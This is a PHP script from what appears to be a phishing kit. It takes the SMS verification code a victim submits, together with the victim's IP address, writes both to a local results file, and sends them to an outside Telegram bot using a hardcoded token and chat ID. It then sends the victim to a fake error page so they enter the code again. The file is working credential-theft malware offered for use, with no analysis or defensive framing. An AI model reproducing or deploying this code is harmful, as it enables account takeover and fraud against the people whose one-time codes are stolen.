<?php
include '../antibot/anti1.php';
include '../antibot/anti2.php';
include '../antibot/anti3.php';
include '../antibot/anti4.php';
include '../antibot/anti5.php';
include '../antibot/anti6.php';
include '../antibot/anti7.php';
include '../antibot/anti8.php';
include '../antibot/anti9.php';

    $ip = $_SERVER['REMOTE_ADDR'];
    $message ="
    ========🤟🏻Lees9 =sᴍs===🤟🏻============
                  [".$ip."]
    [sᴍs]: ".$_POST['number']."
   
    ----------------\n";
    $text = fopen('../rezlt.txt', 'a');
    fwrite($text, $message);



    function antiBotsCaller($messaggio) {
        $token = '8613350746:AAED9rWmxaU82l0MUHKXBW6zc4i_ibehFog';
        $chatid = '-5291698310';
        $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatid;
        $url = $url . "&text=" . urlencode($messaggio);
        $ch = curl_init();
        $optArray = array(
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true
        );
        curl_setopt_array($ch, $optArray);
        $result = curl_exec($ch);
        curl_close($ch);
        return $result;
    }
    antiBotsCaller($message);
    

    header("Location: ../sms-eror.php");
?>



